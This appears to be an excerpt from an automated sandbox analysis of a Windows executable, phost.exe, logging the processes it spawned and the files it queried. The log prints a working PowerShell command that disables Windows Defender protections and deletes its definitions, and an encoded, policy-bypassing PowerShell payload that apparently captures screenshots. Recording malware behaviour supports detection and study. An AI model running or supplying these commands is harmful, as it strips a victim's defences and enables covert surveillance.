              Source: C:\Users\user\Desktop\phost.exeProcess created: C:\Windows\System32\cmd.exe c:\windows\system32\cmd.exe /c "powershell set-mppreference -disableintrusionpreventionsystem $true -disableioavprotection $true -disablerealtimemonitoring $true -disablescriptscanning $true -enablecontrolledfolderaccess disabled -enablenetworkprotection auditmode -force -mapsreporting disabled -submitsamplesconsent neversend && powershell set-mppreference -submitsamplesconsent 2 & "%programfiles%\windows defender\mpcmdrun.exe" -removedefinitions -all"
              Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe powershell set-mppreference -disableintrusionpreventionsystem $true -disableioavprotection $true -disablerealtimemonitoring $true -disablescriptscanning $true -enablecontrolledfolderaccess disabled -enablenetworkprotection auditmode -force -mapsreporting disabled -submitsamplesconsent neversend
              Source: C:\Users\user\Desktop\phost.exeProcess created: C:\Windows\System32\cmd.exe c:\windows\system32\cmd.exe /c "powershell.exe -noprofile -executionpolicy bypass -encodedcommand jabzag8adqbyagmazqagad0aiabaaciadqakahuacwbpag4azwagafmaeqbzahqazqbtadsadqakahuacwbpag4azwagafmaeqbzahqazqbtac4aqwbvagwabablagmadabpag8abgbzac4arwblag4azqbyagkaywa7aa0acgb1ahmaaqbuagcaiabtahkacwb0aguabqauaeqacgbhahcaaqbuagcaowanaaoadqbzagkabgbnacaauwb5ahmadablag0algbxagkabgbkag8adwbzac4argbvahiabqbzadsadqakaa0acgbwahuaygbsagkaywagagmababhahmacwagafmaywbyaguazqbuahmaaabvahqadqakahsadqakacaaiaagacaacab1agiababpagmaiabzahqayqb0agkaywagaewaaqbzahqapabcagkadabtageacaa+acaaqwbhahaadab1ahiazqbtagmacgblaguabgbzacgakqanaaoaiaagacaaiab7aa0acgagacaaiaagacaaiaagacaadgbhahiaiabyaguacwb1agwadabzacaapqagag4azqb3acaatabpahmadaa8aeiaaqb0ag0ayqbwad4akaapadsadqakacaaiaagacaaiaagacaaiab2ageacgagageababsafmaywbyaguazqbuahmaiaa9acaauwbjahiazqblag4algbbagwababtagmacgblaguabgbzadsadqakaa0acgagacaaiaagacaaiaagacaazgbvahiazqbhagmaaaagacgauwbjahiazqblag4aiabzagmacgblaguabgagagkabgagageababsafmaywbyaguazqbuahmakqanaaoaiaagacaaiaagacaaiaagahsadqakacaaiaagacaaiaagacaaiaagacaaiaagahqacgb5aa0acgagacaaiaagacaaiaagacaaiaagacaaiab7aa0acgagacaaiaagacaaiaagacaaiaagacaaiaagacaaiaagafiazqbjahqayqbuagcabablacaaygbvahuabgbkahmaiaa9acaacwbjahiazqblag4algbcag8adqbuagqacwa7aa0acgagacaaiaagacaaiaagacaaiaagacaaiaagacaaiaagahuacwbpag4azwagacgaqgbpahqabqbhahaaiabiagkadabtageacaagad0aiabuaguadwagaeiaaqb0ag0ayqbwacgaygbvahuabgbkahmalgbxagkazab0aggalaagagiabwb1ag4azabzac4asablagkazwboahqakqapaa0acgagacaaiaagacaaiaagacaaiaagacaaiaagacaaiaagahsadqakacaaiaagacaaiaagacaaiaagacaaiaagacaaiaagacaaiaagacaaiab1ahmaaqbuagcaiaaoaecacgbhahaaaabpagmacwagagcacgbhahaaaabpagmacwagad0aiabhahiayqbwaggaaqbjahmalgbgahiabwbtaekabqbhagcazqaoagiaaqb0ag0ayqbwackakqanaaoaiaagacaaiaagacaaiaagacaaiaagacaaiaagacaaiaagacaaiaagahsadqakacaaiaagacaaiaagacaaiaagacaaiaagacaaiaagacaaiaagacaaiaagacaaiaagagcacgbhahaaaabpagmacwauaemabwbwahkargbyag8abqbtagmacgblaguabgaoag4azqb3acaauabvagkabgb0acgaygbvahuabgbkahmalgbmaguazgb0acwaiabiag8adqbuagqacwauafqabwbwackalaagafaabwbpag4adaauaeuabqbwahqaeqasacaaygbvahuabgbkahmalgbtagkaegblackaowanaaoaiaagacaaiaagacaaiaagacaaiaagacaaiaagacaaiaagacaaiaagah0adqakaa0acgagacaaiaagacaaiaagacaaiaagacaaiaagacaaiaagacaaiaagacaacgblahmadqbsahqacwauaeeazabkacgakabcagkadabtageacaapagiaaqb0ag0ayqbwac4aqwbsag8abgblacgakqapadsadqakacaaiaagacaaiaagacaaiaagacaaiaagacaaiaagacaafqanaaoaiaagacaaiaagacaaiaagacaaiaagacaafqanaaoaiaagacaaiaagacaaiaagacaaiaagacaaywbhahqaywboacaakabfahgaywblahaadabpag8abgapaa0acgagacaaiaagacaaiaagacaaiaagacaaiab7aa0acgagacaaiaagacaaiaagacaaiaagacaaiaagacaaiaagac8alwagaegayqbuagqabablacaayqbuahkaiablahgaywblahaadabpag8abgbzacaaaablahiazqanaaoaiaagacaaiaagacaaiaagacaaiaagacaafqanaaoaiaagacaaiaagacaaiaagah0adqakaa0acgagacaaiaagacaaiaagacaacgblahqadqbyag4aiabyaguacwb1agwadabzadsadqakacaaiaagacaafqanaaoafqanaaoaigbaaa0acganaaoaqqbkagqalqbuahkacablacaalqbuahkacablaeqazqbmagkabgbpahqaaqbvag4aiaakahmabwb1ahiaywblacaalqbsaguazgblahiazqbuagmazqbkaeeacwbzaguabqbiagwaaqblahmaia
              Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe powershell.exe -noprofile -executionpolicy bypass -encodedcommand jabzag8adqbyagmazqagad0aiabaaciadqakahuacwbpag4azwagafmaeqbzahqazqbtadsadqakahuacwbpag4azwagafmaeqbzahqazqbtac4aqwbvagwabablagmadabpag8abgbzac4arwblag4azqbyagkaywa7aa0acgb1ahmaaqbuagcaiabtahkacwb0aguabqauaeqacgbhahcaaqbuagcaowanaaoadqbzagkabgbnacaauwb5ahmadablag0algbxagkabgbkag8adwbzac4argbvahiabqbzadsadqakaa0acgbwahuaygbsagkaywagagmababhahmacwagafmaywbyaguazqbuahmaaabvahqadqakahsadqakacaaiaagacaacab1agiababpagmaiabzahqayqb0agkaywagaewaaqbzahqapabcagkadabtageacaa+acaaqwbhahaadab1ahiazqbtagmacgblaguabgbzacgakqanaaoaiaagacaaiab7aa0acgagacaaiaagacaaiaagacaadgbhahiaiabyaguacwb1agwadabzacaapqagag4azqb3acaatabpahmadaa8aeiaaqb0ag0ayqbwad4akaapadsadqakacaaiaagacaaiaagacaaiab2ageacgagageababsafmaywbyaguazqbuahmaiaa9acaauwbjahiazqblag4algbbagwababtagmacgblaguabgbzadsadqakaa0acgagacaaiaagacaaiaagacaazgbvahiazqbhagmaaaagacgauwbjahiazqblag4aiabzagmacgblaguabgagagkabgagageababsafmaywbyaguazqbuahmakqanaaoaiaagacaaiaagacaaiaagahsadqakacaaiaagacaaiaagacaaiaagacaaiaagahqacgb5aa0acgagacaaiaagacaaiaagacaaiaagacaaiab7aa0acgagacaaiaagacaaiaagacaaiaagacaaiaagacaaiaagafiazqbjahqayqbuagcabablacaaygbvahuabgbkahmaiaa9acaacwbjahiazqblag4algbcag8adqbuagqacwa7aa0acgagacaaiaagacaaiaagacaaiaagacaaiaagacaaiaagahuacwbpag4azwagacgaqgbpahqabqbhahaaiabiagkadabtageacaagad0aiabuaguadwagaeiaaqb0ag0ayqbwacgaygbvahuabgbkahmalgbxagkazab0aggalaagagiabwb1ag4azabzac4asablagkazwboahqakqapaa0acgagacaaiaagacaaiaagacaaiaagacaaiaagacaaiaagahsadqakacaaiaagacaaiaagacaaiaagacaaiaagacaaiaagacaaiaagacaaiab1ahmaaqbuagcaiaaoaecacgbhahaaaabpagmacwagagcacgbhahaaaabpagmacwagad0aiabhahiayqbwaggaaqbjahmalgbgahiabwbtaekabqbhagcazqaoagiaaqb0ag0ayqbwackakqanaaoaiaagacaaiaagacaaiaagacaaiaagacaaiaagacaaiaagacaaiaagahsadqakacaaiaagacaaiaagacaaiaagacaaiaagacaaiaagacaaiaagacaaiaagacaaiaagagcacgbhahaaaabpagmacwauaemabwbwahkargbyag8abqbtagmacgblaguabgaoag4azqb3acaauabvagkabgb0acgaygbvahuabgbkahmalgbmaguazgb0acwaiabiag8adqbuagqacwauafqabwbwackalaagafaabwbpag4adaauaeuabqbwahqaeqasacaaygbvahuabgbkahmalgbtagkaegblackaowanaaoaiaagacaaiaagacaaiaagacaaiaagacaaiaagacaaiaagacaaiaagah0adqakaa0acgagacaaiaagacaaiaagacaaiaagacaaiaagacaaiaagacaaiaagacaacgblahmadqbsahqacwauaeeazabkacgakabcagkadabtageacaapagiaaqb0ag0ayqbwac4aqwbsag8abgblacgakqapadsadqakacaaiaagacaaiaagacaaiaagacaaiaagacaaiaagacaafqanaaoaiaagacaaiaagacaaiaagacaaiaagacaafqanaaoaiaagacaaiaagacaaiaagacaaiaagacaaywbhahqaywboacaakabfahgaywblahaadabpag8abgapaa0acgagacaaiaagacaaiaagacaaiaagacaaiab7aa0acgagacaaiaagacaaiaagacaaiaagacaaiaagacaaiaagac8alwagaegayqbuagqabablacaayqbuahkaiablahgaywblahaadabpag8abgbzacaaaablahiazqanaaoaiaagacaaiaagacaaiaagacaaiaagacaafqanaaoaiaagacaaiaagacaaiaagah0adqakaa0acgagacaaiaagacaaiaagacaacgblahqadqbyag4aiabyaguacwb1agwadabzadsadqakacaaiaagacaafqanaaoafqanaaoaigbaaa0acganaaoaqqbkagqalqbuahkacablacaalqbuahkacablaeqazqbmagkabgbpahqaaqbvag4aiaakahmabwb1ahiaywblacaalqbsaguazgblahiazqbuagmazqbkaeeacwbzaguabqbiagwaaqblahmaiab
              Source: C:\Users\user\Desktop\phost.exeProcess created: C:\Windows\System32\cmd.exe c:\windows\system32\cmd.exe /c "powershell set-mppreference -disableintrusionpreventionsystem $true -disableioavprotection $true -disablerealtimemonitoring $true -disablescriptscanning $true -enablecontrolledfolderaccess disabled -enablenetworkprotection auditmode -force -mapsreporting disabled -submitsamplesconsent neversend && powershell set-mppreference -submitsamplesconsent 2 & "%programfiles%\windows defender\mpcmdrun.exe" -removedefinitions -all"Jump to behavior
              Source: C:\Users\user\Desktop\phost.exeProcess created: C:\Windows\System32\cmd.exe c:\windows\system32\cmd.exe /c "powershell.exe -noprofile -executionpolicy bypass -encodedcommand jabzag8adqbyagmazqagad0aiabaaciadqakahuacwbpag4azwagafmaeqbzahqazqbtadsadqakahuacwbpag4azwagafmaeqbzahqazqbtac4aqwbvagwabablagmadabpag8abgbzac4arwblag4azqbyagkaywa7aa0acgb1ahmaaqbuagcaiabtahkacwb0aguabqauaeqacgbhahcaaqbuagcaowanaaoadqbzagkabgbnacaauwb5ahmadablag0algbxagkabgbkag8adwbzac4argbvahiabqbzadsadqakaa0acgbwahuaygbsagkaywagagmababhahmacwagafmaywbyaguazqbuahmaaabvahqadqakahsadqakacaaiaagacaacab1agiababpagmaiabzahqayqb0agkaywagaewaaqbzahqapabcagkadabtageacaa+acaaqwbhahaadab1ahiazqbtagmacgblaguabgbzacgakqanaaoaiaagacaaiab7aa0acgagacaaiaagacaaiaagacaadgbhahiaiabyaguacwb1agwadabzacaapqagag4azqb3acaatabpahmadaa8aeiaaqb0ag0ayqbwad4akaapadsadqakacaaiaagacaaiaagacaaiab2ageacgagageababsafmaywbyaguazqbuahmaiaa9acaauwbjahiazqblag4algbbagwababtagmacgblaguabgbzadsadqakaa0acgagacaaiaagacaaiaagacaazgbvahiazqbhagmaaaagacgauwbjahiazqblag4aiabzagmacgblaguabgagagkabgagageababsafmaywbyaguazqbuahmakqanaaoaiaagacaaiaagacaaiaagahsadqakacaaiaagacaaiaagacaaiaagacaaiaagahqacgb5aa0acgagacaaiaagacaaiaagacaaiaagacaaiab7aa0acgagacaaiaagacaaiaagacaaiaagacaaiaagacaaiaagafiazqbjahqayqbuagcabablacaaygbvahuabgbkahmaiaa9acaacwbjahiazqblag4algbcag8adqbuagqacwa7aa0acgagacaaiaagacaaiaagacaaiaagacaaiaagacaaiaagahuacwbpag4azwagacgaqgbpahqabqbhahaaiabiagkadabtageacaagad0aiabuaguadwagaeiaaqb0ag0ayqbwacgaygbvahuabgbkahmalgbxagkazab0aggalaagagiabwb1ag4azabzac4asablagkazwboahqakqapaa0acgagacaaiaagacaaiaagacaaiaagacaaiaagacaaiaagahsadqakacaaiaagacaaiaagacaaiaagacaaiaagacaaiaagacaaiaagacaaiab1ahmaaqbuagcaiaaoaecacgbhahaaaabpagmacwagagcacgbhahaaaabpagmacwagad0aiabhahiayqbwaggaaqbjahmalgbgahiabwbtaekabqbhagcazqaoagiaaqb0ag0ayqbwackakqanaaoaiaagacaaiaagacaaiaagacaaiaagacaaiaagacaaiaagacaaiaagahsadqakacaaiaagacaaiaagacaaiaagacaaiaagacaaiaagacaaiaagacaaiaagacaaiaagagcacgbhahaaaabpagmacwauaemabwbwahkargbyag8abqbtagmacgblaguabgaoag4azqb3acaauabvagkabgb0acgaygbvahuabgbkahmalgbmaguazgb0acwaiabiag8adqbuagqacwauafqabwbwackalaagafaabwbpag4adaauaeuabqbwahqaeqasacaaygbvahuabgbkahmalgbtagkaegblackaowanaaoaiaagacaaiaagacaaiaagacaaiaagacaaiaagacaaiaagacaaiaagah0adqakaa0acgagacaaiaagacaaiaagacaaiaagacaaiaagacaaiaagacaaiaagacaacgblahmadqbsahqacwauaeeazabkacgakabcagkadabtageacaapagiaaqb0ag0ayqbwac4aqwbsag8abgblacgakqapadsadqakacaaiaagacaaiaagacaaiaagacaaiaagacaaiaagacaafqanaaoaiaagacaaiaagacaaiaagacaaiaagacaafqanaaoaiaagacaaiaagacaaiaagacaaiaagacaaywbhahqaywboacaakabfahgaywblahaadabpag8abgapaa0acgagacaaiaagacaaiaagacaaiaagacaaiab7aa0acgagacaaiaagacaaiaagacaaiaagacaaiaagacaaiaagac8alwagaegayqbuagqabablacaayqbuahkaiablahgaywblahaadabpag8abgbzacaaaablahiazqanaaoaiaagacaaiaagacaaiaagacaaiaagacaafqanaaoaiaagacaaiaagacaaiaagah0adqakaa0acgagacaaiaagacaaiaagacaacgblahqadqbyag4aiabyaguacwb1agwadabzadsadqakacaaiaagacaafqanaaoafqanaaoaigbaaa0acganaaoaqqbkagqalqbuahkacablacaalqbuahkacablaeqazqbmagkabgbpahqaaqbvag4aiaakahmabwb1ahiaywblacaalqbsaguazgblahiazqbuagmazqbkaeeacwbzaguabqbiagwaaqblahmaiaJump to behavior
              Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe powershell set-mppreference -disableintrusionpreventionsystem $true -disableioavprotection $true -disablerealtimemonitoring $true -disablescriptscanning $true -enablecontrolledfolderaccess disabled -enablenetworkprotection auditmode -force -mapsreporting disabled -submitsamplesconsent neversendJump to behavior
              Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe powershell.exe -noprofile -executionpolicy bypass -encodedcommand jabzag8adqbyagmazqagad0aiabaaciadqakahuacwbpag4azwagafmaeqbzahqazqbtadsadqakahuacwbpag4azwagafmaeqbzahqazqbtac4aqwbvagwabablagmadabpag8abgbzac4arwblag4azqbyagkaywa7aa0acgb1ahmaaqbuagcaiabtahkacwb0aguabqauaeqacgbhahcaaqbuagcaowanaaoadqbzagkabgbnacaauwb5ahmadablag0algbxagkabgbkag8adwbzac4argbvahiabqbzadsadqakaa0acgbwahuaygbsagkaywagagmababhahmacwagafmaywbyaguazqbuahmaaabvahqadqakahsadqakacaaiaagacaacab1agiababpagmaiabzahqayqb0agkaywagaewaaqbzahqapabcagkadabtageacaa+acaaqwbhahaadab1ahiazqbtagmacgblaguabgbzacgakqanaaoaiaagacaaiab7aa0acgagacaaiaagacaaiaagacaadgbhahiaiabyaguacwb1agwadabzacaapqagag4azqb3acaatabpahmadaa8aeiaaqb0ag0ayqbwad4akaapadsadqakacaaiaagacaaiaagacaaiab2ageacgagageababsafmaywbyaguazqbuahmaiaa9acaauwbjahiazqblag4algbbagwababtagmacgblaguabgbzadsadqakaa0acgagacaaiaagacaaiaagacaazgbvahiazqbhagmaaaagacgauwbjahiazqblag4aiabzagmacgblaguabgagagkabgagageababsafmaywbyaguazqbuahmakqanaaoaiaagacaaiaagacaaiaagahsadqakacaaiaagacaaiaagacaaiaagacaaiaagahqacgb5aa0acgagacaaiaagacaaiaagacaaiaagacaaiab7aa0acgagacaaiaagacaaiaagacaaiaagacaaiaagacaaiaagafiazqbjahqayqbuagcabablacaaygbvahuabgbkahmaiaa9acaacwbjahiazqblag4algbcag8adqbuagqacwa7aa0acgagacaaiaagacaaiaagacaaiaagacaaiaagacaaiaagahuacwbpag4azwagacgaqgbpahqabqbhahaaiabiagkadabtageacaagad0aiabuaguadwagaeiaaqb0ag0ayqbwacgaygbvahuabgbkahmalgbxagkazab0aggalaagagiabwb1ag4azabzac4asablagkazwboahqakqapaa0acgagacaaiaagacaaiaagacaaiaagacaaiaagacaaiaagahsadqakacaaiaagacaaiaagacaaiaagacaaiaagacaaiaagacaaiaagacaaiab1ahmaaqbuagcaiaaoaecacgbhahaaaabpagmacwagagcacgbhahaaaabpagmacwagad0aiabhahiayqbwaggaaqbjahmalgbgahiabwbtaekabqbhagcazqaoagiaaqb0ag0ayqbwackakqanaaoaiaagacaaiaagacaaiaagacaaiaagacaaiaagacaaiaagacaaiaagahsadqakacaaiaagacaaiaagacaaiaagacaaiaagacaaiaagacaaiaagacaaiaagacaaiaagagcacgbhahaaaabpagmacwauaemabwbwahkargbyag8abqbtagmacgblaguabgaoag4azqb3acaauabvagkabgb0acgaygbvahuabgbkahmalgbmaguazgb0acwaiabiag8adqbuagqacwauafqabwbwackalaagafaabwbpag4adaauaeuabqbwahqaeqasacaaygbvahuabgbkahmalgbtagkaegblackaowanaaoaiaagacaaiaagacaaiaagacaaiaagacaaiaagacaaiaagacaaiaagah0adqakaa0acgagacaaiaagacaaiaagacaaiaagacaaiaagacaaiaagacaaiaagacaacgblahmadqbsahqacwauaeeazabkacgakabcagkadabtageacaapagiaaqb0ag0ayqbwac4aqwbsag8abgblacgakqapadsadqakacaaiaagacaaiaagacaaiaagacaaiaagacaaiaagacaafqanaaoaiaagacaaiaagacaaiaagacaaiaagacaafqanaaoaiaagacaaiaagacaaiaagacaaiaagacaaywbhahqaywboacaakabfahgaywblahaadabpag8abgapaa0acgagacaaiaagacaaiaagacaaiaagacaaiab7aa0acgagacaaiaagacaaiaagacaaiaagacaaiaagacaaiaagac8alwagaegayqbuagqabablacaayqbuahkaiablahgaywblahaadabpag8abgbzacaaaablahiazqanaaoaiaagacaaiaagacaaiaagacaaiaagacaafqanaaoaiaagacaaiaagacaaiaagah0adqakaa0acgagacaaiaagacaaiaagacaacgblahqadqbyag4aiabyaguacwb1agwadabzadsadqakacaaiaagacaafqanaaoafqanaaoaigbaaa0acganaaoaqqbkagqalqbuahkacablacaalqbuahkacablaeqazqbmagkabgbpahqaaqbvag4aiaakahmabwb1ahiaywblacaalqbsaguazgblahiazqbuagmazqbkaeeacwbzaguabqbiagwaaqblahmaiab
              Source: C:\Users\user\AppData\Local\Temp\_MEI32202\rar.exeCode function: 105_2_00007FF6BBCFB340 AllocateAndInitializeSid,CheckTokenMembership,FreeSid,105_2_00007FF6BBCFB340
              Source: C:\Users\user\Desktop\phost.exeCode function: 0_2_00007FF62CC995E0 cpuid 0_2_00007FF62CC995E0
              Source: C:\Users\user\Desktop\phost.exeQueries volume information: C:\Users\user\AppData\Local\Temp\_MEI32202\base_library.zip VolumeInformationJump to behavior
              Source: C:\Users\user\Desktop\phost.exeQueries volume information: C:\Users\user\AppData\Local\Temp\_MEI32202\base_library.zip VolumeInformationJump to behavior
              Source: C:\Users\user\Desktop\phost.exeQueries volume information: C:\Users\user\AppData\Local\Temp\_MEI32202\base_library.zip VolumeInformationJump to behavior
              Source: C:\Users\user\Desktop\phost.exeQueries volume information: C:\Users\user\AppData\Local\Temp\_MEI32202\base_library.zip VolumeInformationJump to behavior
              Source: C:\Users\user\Desktop\phost.exeQueries volume information: C:\Users\user\AppData\Local\Temp\_MEI32202\base_library.zip VolumeInformationJump to behavior
              Source: C:\Users\user\Desktop\phost.exeQueries volume information: C:\Users\user\AppData\Local\Temp\_MEI32202\base_library.zip VolumeInformationJump to behavior
              Source: C:\Users\user\Desktop\phost.exeQueries volume information: C:\Users\user\AppData\Local\Temp\_MEI32202\base_library.zip VolumeInformationJump to behavior
              Source: C:\Users\user\Desktop\phost.exeQueries volume information: C:\Users\user\AppData\Local\Temp\_MEI32202\base_library.zip VolumeInformationJump to behavior
              Source: C:\Users\user\Desktop\phost.exeQueries volume information: C:\Users\user\AppData\Local\Temp\_MEI32202\base_library.zip VolumeInformationJump to behavior
              Source: C:\Users\user\Desktop\phost.exeQueries volume information: C:\Users\user\AppData\Local\Temp\_MEI32202\base_library.zip VolumeInformationJump to behavior
              Source: C:\Users\user\Desktop\phost.exeQueries volume information: C:\Users\user\AppData\Local\Temp\_MEI32202\base_library.zip VolumeInformationJump to behavior
              Source: C:\Users\user\Desktop\phost.exeQueries volume information: C:\Users\user\Desktop\phost.exe VolumeInformationJump to behavior
              Source: C:\Users\user\Desktop\phost.exeQueries volume information: C:\Users\user\AppData\Local\Temp\_MEI32202 VolumeInformationJump to behavior
              Source: C:\Users\user\Desktop\phost.exeQueries volume information: C:\Users\user\AppData\Local\Temp\_MEI32202 VolumeInformationJump to behavior
              Source: C:\Users\user\Desktop\phost.exeQueries volume information: C:\Users\user\Desktop\phost.exe VolumeInformationJump to behavior
              Source: C:\Users\user\Desktop\phost.exeQueries volume information: C:\Users\user\AppData\Local\Temp\_MEI32202\base_library.zip VolumeInformationJump to behavior
              Source: C:\Users\user\Desktop\phost.exeQueries volume information: C:\Users\user\AppData\Local\Temp\_MEI32202\base_library.zip VolumeInformationJump to behavior
              Source: C:\Users\user\Desktop\phost.exeQueries volume information: C:\Users\user\AppData\Local\Temp\_MEI32202 VolumeInformationJump to behavior
              Source: C:\Users\user\Desktop\phost.exeQueries volume information: C:\Users\user\AppData\Local\Temp\_MEI32202 VolumeInformationJump to behavior
              Source: C:\Users\user\Desktop\phost.exeQueries volume information: C:\Users\user\AppData\Local\Temp\_MEI32202\_ctypes.pyd VolumeInformationJump to behavior
              Source: C:\Users\user\Desktop\phost.exeQueries volume information: C:\Users\user\AppData\Local\Temp\_MEI32202 VolumeInformationJump to behavior
              Source: C:\Users\user\Desktop\phost.exeQueries volume information: C:\Users\user\Desktop\phost.exe VolumeInformationJump to behavior
              Source: C:\Users\user\Desktop\phost.exeQueries volume information: C:\Users\user\Desktop\phost.exe VolumeInformationJump to behavior
              Source: C:\Users\user\Desktop\phost.exeQueries volume information: C:\Users\user\Desktop\phost.exe VolumeInformationJump to behavior
              Source: C:\Users\user\Desktop\phost.exeQueries volume information: C:\Users\user\AppData\Local\Temp\_MEI32202\base_library.zip VolumeInformationJump to behavior
              Source: C:\Users\user\Desktop\phost.exeQueries volume information: C:\Users\user\AppData\Local\Temp\_MEI32202\base_library.zip VolumeInformationJump to behavior
              Source: C:\Users\user\Desktop\phost.exeQueries volume information: C:\Users\user\AppData\Local\Temp\_MEI32202\base_library.zip VolumeInformationJump to behavior
              Source: C:\Users\user\Desktop\phost.exeQueries volume information: C:\Users\user\AppData\Local\Temp\_MEI32202\base_library.zip VolumeInformationJump to behavior
              Source: C:\Users\user\Desktop\phost.exeQueries volume information: C:\Users\user\AppData\Local\Temp\_MEI32202\base_library.zip VolumeInformationJump to behavior
              Source: C:\Users\user\Desktop\phost.exeQueries volume information: C:\Users\user\AppData\Local\Temp\_MEI32202\base_library.zip VolumeInformationJump to behavior
              Source: C:\Users\user\Desktop\phost.exeQueries volume information: C:\Users\user\AppData\Local\Temp\_MEI32202\base_library.zip VolumeInformationJump to behavior
              Source: C:\Users\user\Desktop\phost.exeQueries volume information: C:\Users\user\AppData\Local\Temp\_MEI32202\base_library.zip VolumeInformationJump to behavior
              Source: C:\Users\user\Desktop\phost.exeQueries volume information: C:\Users\user\AppData\Local\Temp\_MEI32202\base_library.zip VolumeInformationJump to behavior
              Source: C:\Users\user\Desktop\phost.exeQueries volume information: C:\Users\user\AppData\Local\Temp\_MEI32202\base_library.zip VolumeInformationJump to behavior
              Source: C:\Users\user\Desktop\phost.exeQueries volume information: C:\Users\user\AppData\Local\Temp\_MEI32202\base_library.zip VolumeInformationJump to behavior
              Source: C:\Users\user\Desktop\phost.exeQueries volume information: C:\Users\user\AppData\Local\Temp\_MEI32202\base_library.zip VolumeInformationJump to behavior
              Source: C:\Users\user\Desktop\phost.exeQueries volume information: C:\Users\user\AppData\Local\Temp\_MEI32202\base_library.zip VolumeInformationJump to behavior
              Source: C:\Users\user\Desktop\phost.exeQueries volume information: C:\Users\user\AppData\Local\Temp\_MEI32202\base_library.zip VolumeInformationJump to behavior
              Source: C:\Users\user\Desktop\phost.exeQueries volume information: C:\Users\user\AppData\Local\Temp\_MEI32202\base_library.zip VolumeInformationJump to behavior
              Source: C:\Users\user\Desktop\phost.exeQueries volume information: C:\Users\user\AppData\Local\Temp\_MEI32202\base_library.zip VolumeInformationJump to behavior
              Source: C:\Users\user\Desktop\phost.exeQueries volume information: C:\Users\user\AppData\Local\Temp\_MEI32202\base_library.zip VolumeInformationJump to behavior
              Source: C:\Users\user\Desktop\phost.exeQueries volume information: C:\Users\user\AppData\Local\Temp\_MEI32202\base_library.zip VolumeInformationJump to behavior
              Source: C:\Users\user\Desktop\phost.exeQueries volume information: C:\Users\user\AppData\Local\Temp\_MEI32202\base_library.zip VolumeInformationJump to behavior
              Source: C:\Users\user\Desktop\phost.exeQueries volume information: C:\Users\user\AppData\Local\Temp\_MEI32202\base_library.zip VolumeInformationJump to behavior
              Source: C:\Users\user\Desktop\phost.exeQueries volume information: C:\Users\user\AppData\Local\Temp\_MEI32202\base_library.zip VolumeInformationJump to behavior
              Source: C:\Users\user\Desktop\phost.exeQueries volume information: C:\Users\user\AppData\Local\Temp\_MEI32202\base_library.zip VolumeInformationJump to behavior
              Source: C:\Users\user\Desktop\phost.exeQueries volume information: C:\Users\user\AppData\Local\Temp\_MEI32202\base_library.zip VolumeInformationJump to behavior
              Source: C:\Users\user\Desktop\phost.exeQueries volume information: C:\Users\user\AppData\Local\Temp\_MEI32202\base_library.zip VolumeInformationJump to behavior
              Source: C:\Users\user\Desktop\phost.exeQueries volume information: C:\Users\user\AppData\Local\Temp\_MEI32202\base_library.zip VolumeInformationJump to behavior
              Source: C:\Users\user\Desktop\phost.exeQueries volume information: C:\Users\user\Desktop\phost.exe VolumeInformationJump to behavior
              Source: C:\Users\user\Desktop\phost.exeQueries volume information: C:\Users\user\Desktop\phost.exe VolumeInformationJump to behavior
              Source: C:\Users\user\Desktop\phost.exeQueries volume information: C:\Users\user\Desktop\phost.exe VolumeInformationJump to behavior
              Source: C:\Users\user\Desktop\phost.exeQueries volume information: C:\Users\user\AppData\Local\Temp\_MEI32202\base_library.zip VolumeInformationJump to behavior
              Source: C:\Users\user\Desktop\phost.exeQueries volume information: C:\Users\user\AppData\Local\Temp\_MEI32202\base_library.zip VolumeInformationJump to behavior
              Source: C:\Users\user\Desktop\phost.exeQueries volume information: C:\Users\user\AppData\Local\Temp\_MEI32202\base_library.zip VolumeInformationJump to behavior
              Source: C:\Users\user\Desktop\phost.exeQueries volume information: C:\Users\user\Desktop\phost.exe VolumeInformationJump to behavior
              Source: C:\Users\user\Desktop\phost.exeQueries volume information: C:\Users\user\AppData\Local\Temp\_MEI32202\base_library.zip VolumeInformationJump to behavior
              Source: C:\Users\user\Desktop\phost.exeQueries volume information: C:\Users\user\AppData\Local\Temp\_MEI32202\base_library.zip VolumeInformationJump to behavior
              Source: C:\Users\user\Desktop\phost.exeQueries volume information: C:\Users\user\AppData\Local\Temp\_MEI32202\base_library.zip VolumeInformationJump to behavior
              Source: C:\Users\user\Desktop\phost.exeQueries volume information: C:\Users\user\AppData\Local\Temp\_MEI32202\base_library.zip VolumeInformationJump to behavior
              Source: C:\Users\user\Desktop\phost.exeQueries volume information: C:\Users\user\Desktop\phost.exe VolumeInformationJump to behavior
              Source: C:\Users\user\Desktop\phost.exeQueries volume information: C:\Users\user\Desktop\phost.exe VolumeInformationJump to behavior
              Source: C:\Users\user\Desktop\phost.exeQueries volume information: C:\Users\user\Desktop\phost.exe VolumeInformationJump to behavior
              Source: C:\Users\user\Desktop\phost.exeQueries volume information: C:\Users\user\AppData\Local\Temp\_MEI32202 VolumeInformationJump to behavior
              Source: C:\Users\user\Desktop\phost.exeQueries volume information: C:\Users\user\Desktop\phost.exe VolumeInformationJump to behavior
              Source: C:\Users\user\Desktop\phost.exeQueries volume information: C:\Users\user\Desktop\phost.exe VolumeInformationJump to behavior
              Source: C:\Users\user\Desktop\phost.exeQueries volume information: C:\Users\user\AppData\Local\Temp\_MEI32202\base_library.zip VolumeInformationJump to behavior
              Source: C:\Users\user\Desktop\phost.exeQueries volume information: C:\Users\user\AppData\Local\Temp\_MEI32202\base_library.zip VolumeInformationJump to behavior
              Source: C:\Users\user\Desktop\phost.exeQueries volume information: C:\Users\user\AppData\Local\Temp\_MEI32202\base_library.zip VolumeInformationJump to behavior
              Source: C:\Users\user\Desktop\phost.exeQueries volume information: C:\Users\user\AppData\Local\Temp\_MEI32202\base_library.zip VolumeInformationJump to behavior
              Source: C:\Users\user\Desktop\phost.exeQueries volume information: C:\Users\user\Desktop\phost.exe VolumeInformationJump to behavior
              Source: C:\Users\user\Desktop\phost.exeQueries volume information: C:\Users\user\AppData\Local\Temp\_MEI32202\blank.aes VolumeInformationJump to behavior
              Source: C:\Users\user\Desktop\phost.exeQueries volume information: C:\Users\user\AppData\Local\Temp\_MEI32202\blank.aes VolumeInformationJump to behavior
              Source: C:\Users\user\Desktop\phost.exeQueries volume information: C:\Users\user\AppData\Local\Temp\_MEI32202\blank.aes VolumeInformationJump to behavior
